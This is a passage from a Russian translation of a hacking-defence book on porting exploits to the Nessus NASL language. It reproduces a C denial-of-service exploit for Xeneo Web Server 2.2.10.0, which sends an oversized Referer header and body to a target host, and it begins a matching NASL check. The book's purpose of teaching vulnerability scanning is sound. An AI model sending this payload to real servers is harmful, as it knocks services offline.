книги хакеры / Защита_от_взлома_сокеты,_эксплойты,_shell_код_Фостер_Дж_

185 http_close_socket(soc);

186

187# Если хост перестал отвечать, сообщить о серьезной проблеме

188if ( http_is_dead(port:port) ) security_hole(port);

189}

190}

Перенос на язык NASL и наоборот

Ïîä переносом кода понимается процедура перевода программы с одного языка на другой. Концептуально перенос выглядит просто, но на практике могут возникнуть сложности, так как надо хорошо знать оба языка. Если языки похожи, например, если речь идет о C и С++, которые имеют схожий синтаксис, набор библиотечных функций и так далее, то задача упрощается. Когда же нужно перенести программу на совсем другой язык, например, с Java на Perl, то все становится куда сложнее, поскольку синтаксис имеет мало общего, а методы проектирования, среды разработки и базовая идеология языков фундаментально различны.

NASL имеет больше общего с такими языками, как C и Perl, чем с жестко структурированными языками типа Java и Python. Синтаксически C и NASL очень похожи, а слабая типизация переменных и удобные высокоуровневые средства манипулирования строками напоминают Perl. Поэтому перенос с C или Perl на NASL, вероятно, покажется вам проще, чем с Java. К счастью, «эксплойты» на Java встречаются не так часто, как на C или Perl. Беглый анализ «эксплойтов» (см. сайт phathookups.com) показал, что примерно 90% написаны на C, 9.7% на Perl и только 0.3% на Java.

Логический анализ

Чтобы упростить процесс переноса, отвлекитесь от синтаксических различий между языками и сконцентрируйтесь на понимании логики программы. Попытайтесь понять, какими средствами программа достигает своих целей. Затем опишите существенные шаги и детали реализации на псевдокоде. И, наконец, переведите псевдокод на нужный вам язык. (Подробнее эти шаги будут описаны в следующей главе.)

Логическая структура программы

Чтение исходного текста – это самый прямой и обычный метод изучения интересующей вас программы. Помимо собственно исходного текста, ценная

речь идет о простом «эксплойте», то для понимания логики сценария может оказаться достаточным ознакомиться с его текстом. В более сложных случаях бывает полезно собрать сведения об «эксплойте» из других источников.

Начните с поиска извещения, которое соответствует «эксплойту». Если таковое существует, то в нем вы найдете информацию о характере уязвимости и методах ее эксплуатации. Если вам повезет, то в извещении будет точно написано, что делает «эксплойт» (переполнение буфера, атака на ошибки при контроле входных данных, исчерпание ресурсов и так далее). Не ограничи- вайтесь поиском извещения о самом «эксплойте», в различных онлайновых сообществах часто можно найти информативные обсуждения известных и вновь обнаруженных уязвимостей. Имейте в виду, что «эксплойты», размещаемые в списках рассылки с полным раскрытием информации, например,

âBugTraq, могут содержать намеренно внесенные ошибки. Автор может слегка «подправить» код, чтобы «эксплойт» не компилировался, или убрать из него важную функциональность, добавить сбивающие с толку комментарии или включать «троянский» код. Хотя некорректный код иногда публикуется по недосмотру, чаще ошибки вносятся осознанно, чтобы усложнить жизнь безграмотным «script kiddie», но при этом продемонстрировать возможность реализации «эксплойта» поставщикам программного обеспече- ния, профессионалам и квалифицированным хакерам.

Важно вычленить основные логические компоненты сценария, который вы собираетесь переносить, будь то путем изучения исходного текста или

âрезультате поиска опубликованной информации. В частности, разберитесь, сколько сетевых соединений создает «эксплойт», что это за соединения, какова природа полезной нагрузки и как эта нагрузка создается, зависит ли «эксплойт» от временных факторов.

Логический поток исполнения сценария может выглядеть примерно так:

1.Открыть сокет.

2.Установить соединение с удаленным хостом, указав номер порта, переданный в качестве аргумента.

3.Проверить шапку и убедиться в том, что хост отвечает.

4.Послать запрос HTPP GET, задав в нем длинную строку в качестве заголовка Referer.

5.Проверить, отвечает ли еще хост (пытаясь получить шапку).

Псевдокод

Получив общее представление о работе «эксплойта», переходите к детальному описанию отдельных шагов. Полезным на этом этапе может оказаться написание псевдокода (текста на смеси естественного языка и языка програм-

«Эксплойты», извещения либо то и другое обычно выкладываются на следующие сайты:

http://www.securityfocus.com (эксплойты, извещения);

http://www.hack.co.za (эксплойты);

http://www.packetstormsecurity.net (эксплойты);

http://www.securiteam.com (эксплойты, извещения);

http://www.security protocols.com (эксплойты, извещения);

http://www.cert.org (извещения);

http://www.sans.org (извещения).

мирования), поскольку при попытке прямого построчного перевода, например, с C вы упустите из виду встроенные в NASL функции. Типичный псевдокод выглядит примерно так:

1example_exploit(ip, port)

6local_socket = получить открытый сокет на локальной системе

7получить информацию об IP от хоста по адресу target_ip

8sock = структура, заполненная полученной информацией

9 my_socket = connect_socket (local_socket, sock)

10

11string payload = HTTP-заголовок с очень длинным Referer

12send(my_socket, payload, length(payload)

13exit

После написания детального псевдокода перевод его на язык реального «эксплойта» становится упражнением на понимание синтаксис языка, имеющихся функций и среды программирования. Если вы уже хорошо знакомы с языком, то этот этап пройдет легко. В противном случае придется заняться копированием примеров и листанием справочного руководства и руководства по программированию на нужном языке.

Перенос на NASL

Перенос «эксплойтов» на NASL имеет то очевидное преимущество, что к вашим услугам вся инфраструктура Nessus. Решившись на этот шаг, вы

10

11 char exploit[] =

12

13 "GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1\r\n"

14"Referer:

http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n"

15"Content-Type: application/x-www-form-urlencoded\r\n"

16"Connection: Keep-Alive\r\n"

17"Cookie: VARIABLE=SPLABS; path=/\r\n"

18"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)\r\n"

19"Variable: result\r\n"

20"Host: localhost\r\n"

21"Content-length: 513\r\n"

22"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\r\n"

23"Accept-Encoding: gzip\r\n"

24"Accept-Language: en\r\n"

25"Accept-Charset: iso-8859-1,*,utf-8\r\n\r\n\r\n"

26

"whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÀÀ

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAААААААА

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAААААААА

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAААААААА

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAААААААА

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";

27

28 int main(int argc, char *argv[])

29{

30WSADATA wsaData;

31WORD wVersionRequested;

32struct hostent *pTarget;

33struct sockaddr_in sock;

34char *target, buffer[30000];

35int port,bufsize;

36SOCKET mysocket;

37

38if (argc < 2)

39{

40printf("Xeneo Web Server 2.2.10.0 DoS\r\n <badpack3t@securityprotocols.com>\r\n\r\n", argv[0]);

41printf("Tool Usage:\r\n %s <targetip> [targetport] (default is 80) \r\n\r\n", argv[0]);

42printf("www.security-protocols.com\r\n\r\n", argv[0]);

43exit(1);

72memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);

73sock.sin_family = AF_INET;

74sock.sin_port = htons((USHORT)port);

75

76printf("Соединяюсь...\n");

77if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))

78{

79printf("Не удалось соединиться с хостом.\n");

80exit(1);

81}

82

83printf("Соединение установлено!...\n");

84printf("Отправляю запрос...\n");

85if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)

86{

87printf("Ошибка при отправке полезной нагрузки эксплойта\r\n");

88closesocket(mysocket);

89exit(1);

90}

91

93closesocket(mysocket);

94WSACleanup();

95return 0;

96}

Целью этой атаки с переполнением буфера является ошибка в Web-сервере Xeneo2, воспользоваться которой можно, послав запрос GET по протоколу HTTP с очень длинным заголовком Referer и параметром whatyoutyped. Важно понимать, что делает «эксплойт» и как он это делает, но знать при этом все о Web-сервере Xeneo2 вовсе не обязательно.

Начнем анализ «эксплойта» с высокоуровневого описания алгоритма:

1.Открыть сокет.

2.Соединиться с удаленным хостом, указав переданный в командной строке номер TCP-порта.

3.Послать запрос HTTP GET с длинным заголовком Referer.

4.Проверить, что хост перестал отвечать.

Псевдокод этого сценария уже приводился в качестве примера выше. Для удобства повторим его:

1example_exploit(ip, port)

6local_socket = получить открытый сокет на локальной системе

7получить информацию об IP от хоста по адресу target_ip

8sock = структура, заполненная полученной информацией

9 my_socket = connect_socket (local_socket, sock)

10

11string payload = HTTP-заголовок с очень длинным Referer

12send(my_socket, payload, length(payload)

13exit

Следующий шаг – перенести этот псевдокод на NASL, ориентируясь на приведенные в этой главе примеры и код других сценариев, которые можно загрузить с сайта nessus.org. Вот окончательный вариант NASL-сценария.

1 # Xeneo Web Server 2.2.10.0 DoS

2#

3# Уязвимые системы:

4 # Xeneo Web Server 2.2.10.0 DoS

5#

6 # Производитель: